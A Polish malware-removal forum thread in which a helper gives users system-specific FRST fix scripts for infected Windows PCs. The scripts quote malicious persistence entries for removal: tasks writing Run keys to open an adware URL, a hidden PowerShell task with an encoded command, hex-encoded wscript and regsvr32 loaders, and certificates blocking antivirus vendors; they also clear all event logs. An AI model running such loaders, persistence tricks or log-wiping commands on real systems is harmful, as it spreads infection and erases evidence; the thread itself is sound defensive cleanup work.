Miszel03

Akcja pomyślnie wykonana, te DNS wykreśliłem, ale skoro jeszcze się załapałaś to nic nie powinno to zmienić (jedne były bezpieczne, bo od COMODO) - w razie potrzeby, możesz je przywrócić. Temat uważam za zakończony.

W takim razie proszę założyć osobny temat i dostarczyć wymagany zestaw raportów. Wszystko pomyślnie wykonane - infekcja zdjęta, system posprzątany z resztek. Poprawki: 1. Detekcje Malwarebytes zdaję się, że dotyczą cracka - ja zalecam usunięcie. 2. Uruchom FRST. Z klawiatury CTRL+Y, zostanie otworzony plik fixlist.txt. Wklej do pliku następującą treść: CloseProcesses: CreateRestorePoint: BootExecute: autocheck autochk * sdnclean64.exe SearchScopes: HKLM -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = SearchScopes: HKLM-x32 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = C:\Users\tomek\AppData\Roaming\Microsoft\Word\cennik306432601337128402\cennik.docx.lnk EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Z klawiatury CTRL+S, by zapisać zmiany. Następnie w oknie FRST klik w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, nastąpi restart systemu. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 3. Po tych zabiegach skoro omawiany problem ustąpił będziemy kończyć. Zastosuj DelFix (kasacja używanych narzędzi) oraz zaktualizuj oprogramowanie zewnętrzne jak i system Windows.

Brakuje raportu Shrotcut - proszę o dostarczenie go w kolejnym poście (przechodzę do dezynfekcji bez niego, bo wydaję się mało ważny w tej sytuacji). Jeśli zaś chodzi o problem tytułowym to tj. w poprzednich tematach na forum infekcja ulokowała się w Harmonogramie zadań i autostarcie - wymagana dezynfekcja. Po za tym sprzątam system z resztek (m.in po przeglądarce Mozilla FireFox). Na przyszłość: widzę, że był zainstalowany SpyHunter - to program wątpliwej reputacji, pod ocenę indywidualną zostawiam decyzje o jego wykorzystywaniu w przyszłości. 1. Uruchom FRST. Z klawiatury CTRL+Y, zostanie otworzony plik fixlist.txt. Wklej do pliku następującą treść: CloseProcesses: CreateRestorePoint: ContextMenuHandlers4: [PowerISO] -> {967B2D40-8B7D-4127-9049-61EA0C2C6DCE} => -> Brak pliku ContextMenuHandlers6: [PowerISO] -> {967B2D40-8B7D-4127-9049-61EA0C2C6DCE} => -> Brak pliku Task: {E50A090E-8D4B-4A02-BAD3-A029AFE2D135} - System32\Tasks\tomek => cmd.exe /c REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /f /v tomek /t REG_SZ /d "explorer.exe hxxp://ozirizsoos.info" HKU\S-1-5-21-2387200897-3327319887-1750219088-1000\...\Run: [tomek] => explorer.exe hxxp://ozirizsoos.info GroupPolicy: Ograniczenia SearchScopes: HKLM -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = SearchScopes: HKLM -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = SearchScopes: HKLM-x32 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = SearchScopes: HKLM-x32 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = S2 Nero BackItUp Scheduler 4.0; C:\Program Files (x86)\Common Files\Nero\Nero BackItUp 4\NBService.exe [X] S3 EsgScanner; system32\DRIVERS\EsgScanner.sys [X] S2 vstor2; \??\C:\Program Files (x86)\Common Files\VMware\VMware Virtual Image Editing\vstor2.sys [X] DeleteKey: HKCU\Software\Mozilla DeleteKey: HKCU\Software\MozillaPlugins DeleteKey: HKLM\SOFTWARE\Mozilla DeleteKey: HKLM\SOFTWARE\MozillaPlugins DeleteKey: HKLM\SOFTWARE\Wow6432Node\Mozilla DeleteKey: HKLM\SOFTWARE\Wow6432Node\mozilla.org DeleteKey: HKLM\SOFTWARE\Wow6432Node\MozillaPlugins C:\Users\tomek\AppData\Local\Mozilla C:\Users\tomek\AppData\Roaming\Mozilla C:\Users\tomek\AppData\Roaming\Profiles Powershell: wevtutil el | Foreach-Object {wevtutil cl "$_"} EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Z klawiatury CTRL+S, by zapisać zmiany. Następnie w oknie FRST klik w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, nastąpi restart systemu. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 2. Całościowo przeskanuj system za pomocą Malwarebytes AntiMalware. Jeśli coś wykryje to niczego nie usuwaj, a dostarcz raport. 3. Zrób nowy log FRST z opcji Skanuj (Scan) wraz z Addition i Shortcut. Dołącz też plik fixlog.txt.

Proszę dbać o pisownie. Muszę mieć pewność, że z system jest już w porządku zanim przejdziemy do finalizacji tematu. Restart komputera po skanowaniu świadczy o tym, że zostały wykryte jakieś nieprawidłowości, mało tego - zostały skorygowane, a przecież prosiłem: raport znajduje się w zakładce Raporty* w głównym interfejsie programu. Proszę o jego dostarczenie w celu weryfikacji. * - zaznacz raport > kliknij w Wyświetl raport > wyświetli się raport > kliknij Eksportuj > z opcji wybierz Plik tekstowy (*.txt) > plik zapisz jako RAPORT na pulpicie > załącz ten plik na forum.

Posty łącze, proszę w takich sytuacjach omyłkowych używać opcji Edytuj, która dostępna jest przy każdym Twoim poście. Skrypt wykonany pomyślnie i infekcja zdjęta, aczkolwiek nie widzę raportu z pkt. 2. Proszę go dostarczyć.

Na forum raczej nie polecamy takim osobom takich aplikacji, ze względu na możliwość uszkodzenia systemu (zdarzały się takie przypadki).

W raportach brak oznak infekcji, poniżej zadaję tylko kosmetykę (tj. kasacja martwych wpisów / skrótów / zadań w Harmonogramie). Uruchom FRST. Z klawiatury CTRL+Y, zostanie otworzony plik fixlist.txt. Wklej do pliku następującą treść: CloseProcesses: CreateRestorePoint: ContextMenuHandlers1: [ANotepad++64] -> [CC]{B298D29A-A6ED-11DE-BA8C-A68E55D89593} => -> Brak pliku ContextMenuHandlers5: [Gadgets] -> {6B9228DA-9C15-419e-856C-19E768A13BDC} => -> Brak pliku Task: {8F7933AA-BB21-4DD0-8598-B8B76ECABEC1} - \OfficeSoftwareProtectionPlatform\SvcRestartTask -> Brak pliku Task: {D29960F8-5773-40A9-B359-316B9D7C0E0D} - \WPD\SqmUpload_S-1-5-21-4203751296-3443087910-3505805039-1000 -> Brak pliku Task: {DC4BAA2D-0942-4FF0-9441-6ECF28B58ECC} - \Microsoft\Windows\UNP\RunCampaignManager -> Brak pliku HKLM Group Policy restriction on software: %systemroot%\system32\mrt.exe CHR HKLM-x32\...\Chrome\Extension: [eofcbnmajmjmplflapaojjnihcjkigck] - C:\Program Files\AVAST Software\Avast\WebRep\Chrome\aswWebRepChromeSp.crx CHR HKLM-x32\...\Chrome\Extension: [gomekmidlodglbbmalcneegieacbdmki] - C:\Program Files\AVAST Software\Avast\WebRep\Chrome\aswWebRepChrome.crx C:\Users\Michał\Desktop\Programy\Raptr.lnk C:\Users\Michał\Desktop\Programy\SopCast.lnk EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Z klawiatury CTRL+S, by zapisać zmiany. Następnie w oknie FRST klik w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, nastąpi restart systemu. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. Przedstaw go.

Tak, i właśnie chodzi o raporty, które wyskoczą po zakończeniu skanowania. Teraz raporty są w porządku. Infekcja, którą opisujesz umiejscowiła się w Harmonogramie zadań oraz autostarcie. 1. Uruchom FRST. Z klawiatury CTRL+Y, zostanie otworzony plik fixlist.txt. Wklej do pliku następującą treść: CloseProcesses: CreateRestorePoint: ContextMenuHandlers5: [igfxcui] -> {3AB1675A-CCFF-11D2-8B20-00A0C93CB1F4} => C:\Windows\system32\igfxpph.dll -> Brak pliku Task: {16097CC5-ABB4-416C-92A0-5B36D8180ABD} - System32\Tasks\user => cmd.exe /c REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /f /v user /t REG_SZ /d "explorer.exe hxxp://ozirizsoos.info" Task: {20DED804-E176-42B9-A9B0-2D0757378C6B} - System32\Tasks\{66F063EA-5A38-494C-83F5-376C23694667} => C:\Windows\system32\pcalua.exe -a C:\Users\user\AppData\Local\Temp\jre-8u73-windows-au.exe -d C:\Windows\SysWOW64 -c /installmethod=jau FAMILYUPGRADE=1 Task: {9EDA70EC-703F-435B-8457-AF0F186989B3} - System32\Tasks\{B580DD7E-FF52-48DD-B81A-65C73CBC1E28} => C:\Windows\system32\pcalua.exe -a C:\Users\user\AppData\Local\Temp\jre-8u144-windows-au.exe -d C:\Windows\SysWOW64 -c /installmethod=jau FAMILYUPGRADE=1 Winlogon\Notify\igfxcui: igfxdev.dll [X] HKLM\...\Policies\Explorer: [NoViewContextMenu] 0 HKU\S-1-5-21-2052047121-4088128527-1503522172-1000\...\Run: [user] => explorer.exe hxxp://ozirizsoos.info HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Ograniczenia SearchScopes: HKLM -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = SearchScopes: HKLM-x32 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = SearchScopes: HKU\S-1-5-21-2052047121-4088128527-1503522172-1000 -> {962B6AC7-71F2-416C-8698-8F90C7E08656} URL = FF Plugin: @microsoft.com/GENUINE -> disabled [brak pliku] FF Plugin-x32: @microsoft.com/GENUINE -> disabled [brak pliku] C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Lexmark X1100 Series\Centrum obsługi urządzenia Lexmark.LNK C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Lexmark X1100 Series\Odinstaluj drukarkę Lexmark X1100 Series.LNK C:\Users\user\Desktop\µTorrent.lnk Powershell: wevtutil el | Foreach-Object {wevtutil cl "$_"} EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Z klawiatury CTRL+S, by zapisać zmiany. Następnie w oknie FRST klik w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, nastąpi restart systemu. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 2. Całościowo przeskanuj system za pomocą Malwarebytes AntiMalware. Jeśli coś wykryje to niczego nie usuwaj, a dostarcz raport. 3. Zrób nowy log FRST z opcji Skanuj (Scan) wraz z Addition, ale już bez Shortcut. Dołącz też plik fixlog.txt.

Hmm...nie potrafię zweryfikować tego Holiday Express, ale to raczej nie było adware i całkiem długo siedziało w systemie. Widzę, że odinstalowałeś, a to znaczy, że też nie znałeś tego oprogramowania. Posprzątam po nim resztki, bo są widoczne. Wszystko pomyślnie wykonane, infekcje usunięte. Jesteśmy bardzo blisko końca - wdrążymy poprawki / doczyszczenia i skan antywirusowy. 1. Uruchom FRST. Z klawiatury CTRL+Y, zostanie otworzony plik fixlist.txt. Wklej do pliku następującą treść: CloseProcesses: CreateRestorePoint: C:\Program Files (x86)\BiaoJi C:\ProgramData\2e89a3 C:\ProgramData\3fed80ce-11f1-0 C:\ProgramData\3fed80ce-6ab7-1 C:\ProgramData\f595a9da-09e7-0 C:\ProgramData\f595a9da-27b7-1 C:\ProgramData\f595a9da-4f15-0 C:\ProgramData\f595a9da-5873-0 C:\ProgramData\f595a9da-6717-1 C:\ProgramData\f595a9da-7567-1 C:\ProgramData\595a9da-7627-1 C:\ProgramData\f595a9da-77e3-0 C:\ProgramData\f595a9da-7951-0 C:\ProgramData\{2b155d02-712c-1} C:\ProgramData\{69ee4733-212c-0} C:\ProgramData\{1C91D9F2-96D3-5334-1015-CD768A5746B8} DeleteKey: HKEY_USERS\S-1-5-21-478647955-3472351390-1182581596-1000\Software\Microsoft\Internet Explorer\LowRegistry\Audio\PolicyConfig\PropertyStore\92a8fc28_0 DeleteValue: HKEY_USERS\S-1-5-21-478647955-3472351390-1182581596-1000\Software\Classes\ftp\DefaultIcon|C:\Program Files (x86)\Cupduck\Application\chrome.exe DeleteValue: HKEY_USERS\S-1-5-21-478647955-3472351390-1182581596-1000\Software\Classes\ftp\shell\open\command|C:\Program Files (x86)\Cupduck\Application\chrome.exe DeleteValue: HKEY_USERS\S-1-5-21-478647955-3472351390-1182581596-1000\Software\Classes\http\DefaultIcon|C:\Program Files (x86)\Cupduck\Application\chrome.exe DeleteValue: HKEY_USERS\S-1-5-21-478647955-3472351390-1182581596-1000\Software\Classes\http\shell\open\command|C:\Program Files (x86)\Cupduck\Application\chrome.exe DeleteValue: HKEY_USERS\S-1-5-21-478647955-3472351390-1182581596-1000\Software\Classes\https\DefaultIcon|C:\Program Files (x86)\Cupduck\Application\chrome.exe DeleteValue: HKEY_USERS\S-1-5-21-478647955-3472351390-1182581596-1000\Software\Classes\https\shell\open\command|C:\Program Files (x86)\Cupduck\Application\chrome.exe DeleteValue: HKEY_USERS\S-1-5-21-478647955-3472351390-1182581596-1000\Software\Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache|C:\Program Files (x86)\Cupduck\Application\chrome.exe DeleteValue: HKEY_LOCAL_MACHINE\SOFTWARE\Clients\StartMenuInternet\FIREFOX.EXE\DefaultIcon|C:\Program Files (x86)\Firefox\Firefox.exe DeleteValue: HKEY_LOCAL_MACHINE\SOFTWARE\Clients\StartMenuInternet\FIREFOX.EXE\InstallInfo|HideIconsCommand DeleteValue: HKEY_LOCAL_MACHINE\SOFTWARE\Clients\StartMenuInternet\FIREFOX.EXE\InstallInfo|ShowIconsCommand DeleteValue: HKEY_LOCAL_MACHINE\SOFTWARE\Clients\StartMenuInternet\FIREFOX.EXE\InstallInfo|ReinstallCommand DeleteValue: HKEY_LOCAL_MACHINE\SOFTWARE\Clients\StartMenuInternet\FIREFOX.EXE\shell\open\command|C:\Program Files (x86)\Firefox\Firefox.exe DeleteValue: HKEY_LOCAL_MACHINE\SOFTWARE\Clients\StartMenuInternet\FIREFOX.EXE\shell\properties\command|C:\Program Files (x86)\Firefox\Firefox.exe DeleteValue: HKEY_LOCAL_MACHINE\SOFTWARE\Clients\StartMenuInternet\FIREFOX.EXE\shell\safemode\command|C:\Program Files (x86)\Firefox\Firefox.exe DeleteValue: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Mozilla\Firefox\TaskBarIDs|C:\Program Files (x86)\Firefox DeleteKey: HKEY_USERS\S-1-5-21-478647955-3472351390-1182581596-1000\Software\Microsoft\Internet Explorer\LowRegistry\Audio\PolicyConfig\PropertyStore\52c9d0d1_0 DeleteKey: HKEY_USERS\S-1-5-21-478647955-3472351390-1182581596-1000\Software\Microsoft\Internet Explorer\LowRegistry\Audio\PolicyConfig\PropertyStore\fca1c7bd_0 DeleteValue: HKEY_USERS\S-1-5-21-478647955-3472351390-1182581596-1000\Software\Classes\FirefoxHTML\DefaultIcon|C:\Program Files (x86)\Firefox\Firefox.exe DeleteValue: HKEY_USERS\S-1-5-21-478647955-3472351390-1182581596-1000\Software\Classes\FirefoxHTML\shell\open\command|C:\Program Files (x86)\Firefox\Firefox.exe DeleteValue: HKEY_USERS\S-1-5-21-478647955-3472351390-1182581596-1000\Software\Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache|C:\Program Files (x86)\Firefox\Firefox.exe Task: {1F129FC2-B28B-4F23-95C2-11BDF2DA58D8} - \82F37914-A36A-6A79-9CCE-BAC5980BBB44 -> Brak pliku Task: {6A1F19EA-FEA4-4EB4-8C78-71ED288E5F41} - \{F55353F7-257A-4BE2-CE80-ED3F1C1ADC3E} -> Brak pliku Task: {701E6EDB-E683-4D57-813D-E256B1808554} - System32\Tasks\{0EDCAC6C-EC6E-4273-9CC9-9C597BBB150D} => D:\Holiday Express\HolidayExpress.exe ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Przeglądarka Opera.lnk -> C:\Program Files (x86)\Opera\launcher.exe (Opera Software) -> hxxp://www.mylucky123.com/?type=sc&ts=1476176082&z=5a5e095b84e47c2131f1dc1g1z5mdqdgem4q2e5b3c&from=che0812&uid=ST1000DM003-1SB10C_Z9A2CATBXXXXZ9A2CATB ShortcutWithArgument: C:\Users\Public\Desktop\Przeglądarka Opera.lnk -> C:\Program Files (x86)\Opera\launcher.exe (Opera Software) -> hxxp://www.mylucky123.com/?type=sc&ts=1476176082&z=5a5e095b84e47c2131f1dc1g1z5mdqdgem4q2e5b3c&from=che0812&uid=ST1000DM003-1SB10C_Z9A2CATBXXXXZ9A2CATB HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Ograniczenia C:\Users\administratorka\Desktop\gierki\Holiday Express.lnk EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Z klawiatury CTRL+S, by zapisać zmiany. Następnie w oknie FRST klik w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, nastąpi restart systemu. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 2. Dostarcz przefiltrowany raport SFC z opcji sfc /scannow w celu sprawdzenia integralności Windows. 3. Całościowo przeskanuj system za pomocą Malwarebytes AntiMalware. Jeśli coś wykryje to niczego nie usuwaj, a dostarcz raport. 4. Zrób nowy log FRST z opcji Skanuj (Scan) wraz z Addition, ale już bez Shortcut. Dołącz też plik fixlog.txt.

Raporty kasuje, ponieważ mają być bez dat, czyli z miejsca, z którego został uruchomiony FRST, a nie z archiwalnego C:\FRST. Brak dat jest istotny, ponieważ potwierdza, że nie ma nowszych raportów.

Na przyszłość: ten dział służy do leczenia systemu z infekcji, proszę stosować się do zasad. To nie jest problem infekcyjny, więc temat przenoszę do działu Windows 7 (wnioskuję po wyglądzie folderu, że to ten system).

Kolosalny bałagan. Multum instalacji adware i infekcji (w tym infekcja bezplikowa wykonywana przez PowerShell). Niestety, ale zainfekowane są też i DNS (ale tylko spod Windows) - adresy widziane w raportach są izraelski (KLIK / KLIK) i często zgłaszane tu jako infekcyjne. Ponad to fałszywe przeglądarki / profile / certyfikaty (te ostatnie blokują Ci instalacje programów czyszczących m.in AdwCleaner'a). Nie będę się rozpisywał, bo mógłbym pisać do rano co tu widzę i co wymaga korekty. Proszę wykonywać moje zalecenia jeden do jednego, bez pośpiechu - tylko w taki sposób doprowadzimy to szybko do porządku. Podobny przypadek: KLIK. 1. Deinstalacje: Za pomocą Program Install and Uninstall Troubleshooter odinstaluj agresywne adware / PUP: Online Application. Przez Panel Sterowania odinstaluj adware / PUP: WarThunder, FastDataX 1.20 i jeśli nie znasz to też Holiday Express. 2. Uruchom FRST. Z klawiatury CTRL+Y, zostanie otworzony plik fixlist.txt. Wklej do pliku następującą treść: CloseProcesses: CreateRestorePoint: HKU\S-1-5-21-478647955-3472351390-1182581596-1000\...\ChromeHTML: -> C:\Program Files (x86)\Cupduck\Application\chrome.exe (Google Inc.) C:\Program Files (x86)\Cupduck C:\Users\administratorka\AppData\Local\Cupduck C:\Users\administratorka\AppData\Roaming\Cupduck C:\Program Files (x86)\Firefox C:\Users\administratorka\AppData\Local\Firefox C:\Users\administratorka\AppData\Roaming\Firefox R2 FirefoxU; C:\Program Files (x86)\Firefox\bin\FirefoxUpdate.exe [116376 2017-05-23] () DeleteKey: HKCU\Software\Cupduck DeleteKey: HKLM\SOFTWARE\WOW6432Node\Cupduck DeleteKey: HKCU\Software\Firefox DeleteKey: HKLM\SOFTWARE\WOW6432Node\Firefox CustomCLSID: HKU\S-1-5-21-478647955-3472351390-1182581596-1000_Classes\CLSID\{590C4387-5EBD-4D46-8A84-CD0BA2EF2856}\InprocServer32 -> C:\Users\administratorka\AppData\Local\Google\Update\1.3.30.3\psuser_64.dll => Brak pliku CustomCLSID: HKU\S-1-5-21-478647955-3472351390-1182581596-1000_Classes\CLSID\{59B55F04-DE14-4BB8-92FF-C4A22EF2E5F4}\InprocServer32 -> C:\Users\administratorka\AppData\Local\Google\Update\1.3.31.5\psuser_64.dll => Brak pliku CustomCLSID: HKU\S-1-5-21-478647955-3472351390-1182581596-1000_Classes\CLSID\{793EE463-1304-471C-ADF1-68C2FFB01247}\InprocServer32 -> C:\Users\administratorka\AppData\Local\Google\Update\1.3.29.5\psuser_64.dll => Brak pliku CustomCLSID: HKU\S-1-5-21-478647955-3472351390-1182581596-1000_Classes\CLSID\{8C46158B-D978-483C-A312-16EE5013BE04}\InprocServer32 -> C:\Users\administratorka\AppData\Local\Google\Update\1.3.33.3\psuser_64.dll => Brak pliku CustomCLSID: HKU\S-1-5-21-478647955-3472351390-1182581596-1000_Classes\CLSID\{CB492AF1-2CEF-4E58-BE47-471C77D0C8BA}\InprocServer32 -> C:\Users\administratorka\AppData\Local\Google\Update\1.3.32.7\psuser_64.dll => Brak pliku CustomCLSID: HKU\S-1-5-21-478647955-3472351390-1182581596-1000_Classes\CLSID\{E68D0A55-3C40-4712-B90D-DCFA93FF2534}\InprocServer32 -> C:\Users\administratorka\AppData\Roaming\GG\ggdrive\ggdrive-menu.dll => Brak pliku ContextMenuHandlers1_S-1-5-21-478647955-3472351390-1182581596-1000: [GGDriveMenu] -> {E68D0A55-3C40-4712-B90D-DCFA93FF2534} => C:\Users\administratorka\AppData\Roaming\GG\ggdrive\ggdrive-menu.dll -> Brak pliku ContextMenuHandlers4_S-1-5-21-478647955-3472351390-1182581596-1000: [GGDriveMenu] -> {E68D0A55-3C40-4712-B90D-DCFA93FF2534} => C:\Users\administratorka\AppData\Roaming\GG\ggdrive\ggdrive-menu.dll -> Brak pliku ContextMenuHandlers5_S-1-5-21-478647955-3472351390-1182581596-1000: [GGDriveMenu] -> {E68D0A55-3C40-4712-B90D-DCFA93FF2534} => C:\Users\administratorka\AppData\Roaming\GG\ggdrive\ggdrive-menu.dll -> Brak pliku Task: {32396D88-557C-4C4E-9B26-025EDAA48549} - \PowerWord-SCT-JT -> Brak pliku Task: {78DD82B5-91E5-44CD-92AD-5D158744913E} - \Windows-WoShiBeiYongDe -> Brak pliku Task: {58483EE7-A7F3-41C5-AD0E-22B2E1469AC7} - System32\Tasks\82F37914-A36A-6A79-9CCE-BAC5980BBB44 => C:\Windows\SysWOW64\regsvr32.exe /n /s /i:"/1190cf1e9d8bccd9 /q" "C:\Users\ADMINI~1\AppData\Local\78EB64~1\{65C50~1." Task: {CD5D4BB2-AF26-4D25-9B2E-D36BB41D916F} - System32\Tasks\{F55353F7-257A-4BE2-CE80-ED3F1C1ADC3E} => C:\Windows\system32\regsvr32.exe /s /n /i:"/rt" "C:\Users\ADMINI~1\AppData\Local\78EB64~1\65c50efb.dll" Task: {6F6305AB-354E-4BB0-8D8D-0AE54BB8D1F0} - System32\Tasks\{838FBDD6-4401-4BFC-8DBC-80C9694AD4AE} => C:\Windows\system32\pcalua.exe -a C:\Users\ADMINI~1\AppData\Local\Temp\lui1CF5.tmp\setup.exe -d C:\Users\ADMINI~1\AppData\Local\Temp\Rar$EXa0.977 Task: {82F5D2D1-674E-40C6-972E-CCADEED6C20A} - System32\Tasks\English To Chaser => C:\Windows\system32\rundll32.exe "C:\Program Files\English To Chaser\English To Chaser.dll",LOBbcwq Task: {C7E8A21F-1FAA-410A-BC72-8DFF12E1A01B} - System32\Tasks\Chromium lotas => "wscript.exe" "C:\ProgramData\{1C91D9F2-96D3-5334-1015-CD768A5746B8}\dodi.txt" "68747470733a2f2f6b6174756e61712e636f6d" "433a5c50726f6772616d446174615c7b31433931443946322d393644332d353333342d313031352d4344373638413537343642387d5c6d6973617361" "433a5c50726f6772616d446174615c7b31433931443946322d393644332d353333342d (dane wartości zawierają 84 znaków więcej). Task: {E9BDE757-84E7-4207-9089-B095B2313ECD} - System32\Tasks\{09097A47-090F-7A0F-0B11-0E090B7D1108} => C:\Windows\system32\WindowsPowershell\v1.0\powershell.exe -nologo -executionpolicy bypass -noninteractive -windowstyle hidden -EncodedCommand IAAgACAAOwA7ACAAIAA7ADsAOwAgACQARQByAHIAbwByAEEAYwB0AGkAbwBuAFAAcgBlAGYAZQByAGUAbgBjAGUAPQAiAHMAdABvAHAAIgA7ACQAcwBjAD0AIgBTAGkAbABlAG4AdABsAHkAQwBvAG4AdABpAG4AdQBlACIAOwAkAFcAYQByAG4AaQBuAGcAUAByAGUAZgBlAHIAZQBuAGMA (dane wartości zawierają 9568 znaków więcej). C:\Users\ADMINI~1\AppData\Local\78EB64~1 C:\Program Files\English To Chaser HKLM\...\RunOnce: [KOMPUTER01] => C:\Windows\TEMP\gC560.tmp.exe [209408 2018-01-24] () HKLM\ DisallowedCertificates: 03D22C9C66915D58C88912B64C1F984B8344EF09 (Comodo Security Solutions) HKLM\ DisallowedCertificates: 0F684EC1163281085C6AF20528878103ACEFCAAB (F-Secure Corporation) HKLM\ DisallowedCertificates: 1667908C9E22EFBD0590E088715CC74BE4C60884 (FRISK Software International/F-Prot) HKLM\ DisallowedCertificates: 18DEA4EFA93B06AE997D234411F3FD72A677EECE (Bitdefender SRL) HKLM\ DisallowedCertificates: 2026D13756EB0DB753DF26CB3B7EEBE3E70BB2CF (G DATA Software AG) HKLM\ DisallowedCertificates: 249BDA38A611CD746A132FA2AF995A2D3C941264 (Malwarebytes Corporation) HKLM\ DisallowedCertificates: 31AC96A6C17C425222C46D55C3CCA6BA12E54DAF (Symantec Corporation) HKLM\ DisallowedCertificates: 331E2046A1CCA7BFEF766724394BE6112B4CA3F7 (Trend Micro) HKLM\ DisallowedCertificates: 3353EA609334A9F23A701B9159E30CB6C22D4C59 (Webroot Inc.) HKLM\ DisallowedCertificates: 373C33726722D3A5D1EDD1F1585D5D25B39BEA1A (SUPERAntiSpyware.com) HKLM\ DisallowedCertificates: 3850EDD77CC74EC9F4829AE406BBF9C21E0DA87F (Kaspersky Lab) HKLM\ DisallowedCertificates: 3D496FA682E65FC122351EC29B55AB94F3BB03FC (AVG Technologies CZ) HKLM\ DisallowedCertificates: 4243A03DB4C3C15149CEA8B38EEA1DA4F26BD159 (PC Tools) HKLM\ DisallowedCertificates: 42727E052C0C2E1B35AB53E1005FD9EDC9DE8F01 (K7 Computing Pvt Ltd) HKLM\ DisallowedCertificates: 4420C99742DF11DD0795BC15B7B0ABF090DC84DF (Doctor Web Ltd.) HKLM\ DisallowedCertificates: 4C0AF5719009B7C9D85C5EAEDFA3B7F090FE5FFF (Emsisoft Ltd) HKLM\ DisallowedCertificates: 5240AB5B05D11B37900AC7712A3C6AE42F377C8C (Check Point Software Technologies Ltd.) HKLM\ DisallowedCertificates: 5DD3D41810F28B2A13E9A004E6412061E28FA48D (Emsisoft Ltd) HKLM\ DisallowedCertificates: 7457A3793086DBB58B3858D6476889E3311E550E (K7 Computing Pvt Ltd) HKLM\ DisallowedCertificates: 76A9295EF4343E12DFC5FE05DC57227C1AB00D29 (BullGuard Ltd) HKLM\ DisallowedCertificates: 775B373B33B9D15B58BC02B184704332B97C3CAF (McAfee) HKLM\ DisallowedCertificates: 872CD334B7E7B3C3D1C6114CD6B221026D505EAB (Comodo Security Solutions) HKLM\ DisallowedCertificates: 88AD5DFE24126872B33175D1778687B642323ACF (McAfee) HKLM\ DisallowedCertificates: 9132E8B079D080E01D52631690BE18EBC2347C1E (Adaware Software) HKLM\ DisallowedCertificates: 982D98951CF3C0CA2A02814D474A976CBFF6BDB1 (Safer Networking Ltd.) HKLM\ DisallowedCertificates: 9A08641F7C5F2CCA0888388BE3E5DBDDAAA3B361 (Webroot Inc.) HKLM\ DisallowedCertificates: 9C43F665E690AB4D486D4717B456C5554D4BCEB5 (ThreatTrack Security) HKLM\ DisallowedCertificates: 9E3F95577B37C74CA2F70C1E1859E798B7FC6B13 (CURIOLAB S.M.B.A.) HKLM\ DisallowedCertificates: A1F8DCB086E461E2ABB4B46ADCFA0B48C58B6E99 (Avira Operations GmbH & Co. KG) HKLM\ DisallowedCertificates: A5341949ABE1407DD7BF7DFE75460D9608FBC309 (BullGuard Ltd) HKLM\ DisallowedCertificates: A59CC32724DD07A6FC33F7806945481A2D13CA2F (ESET) HKLM\ DisallowedCertificates: AB7E760DA2485EA9EF5A6EEE7647748D4BA6B947 (AVG Technologies CZ) HKLM\ DisallowedCertificates: AD4C5429E10F4FF6C01840C20ABA344D7401209F (Avast Antivirus/Software) HKLM\ DisallowedCertificates: AD96BB64BA36379D2E354660780C2067B81DA2E0 (Symantec Corporation) HKLM\ DisallowedCertificates: B8EBF0E696AF77F51C96DB4D044586E2F4F8FD84 (Malwarebytes Corporation) HKLM\ DisallowedCertificates: CDC37C22FE9272D8F2610206AD397A45040326B8 (Trend Micro) HKLM\ DisallowedCertificates: D3F78D747E7C5D6D3AE8ABFDDA7522BFB4CBD598 (Kaspersky Lab) HKLM\ DisallowedCertificates: DB303C9B61282DE525DC754A535CA2D6A9BD3D87 (ThreatTrack Security) HKLM\ DisallowedCertificates: DB77E5CFEC34459146748B667C97B185619251BA (Avast Antivirus/Software) HKLM\ DisallowedCertificates: E22240E837B52E691C71DF248F12D27F96441C00 (Total Defense, Inc.) HKLM\ DisallowedCertificates: E513EAB8610CFFD7C87E00BCA15C23AAB407FCEF (AVG Technologies CZ) HKLM\ DisallowedCertificates: ED841A61C0F76025598421BC1B00E24189E68D54 (Bitdefender SRL) HKLM\ DisallowedCertificates: F83099622B4A9F72CB5081F742164AD1B8D048C9 (ESET) HKLM\ DisallowedCertificates: FBB42F089AF2D570F2BF6F493D107A3255A9BB1A (Panda Security S.L) HKLM\ DisallowedCertificates: 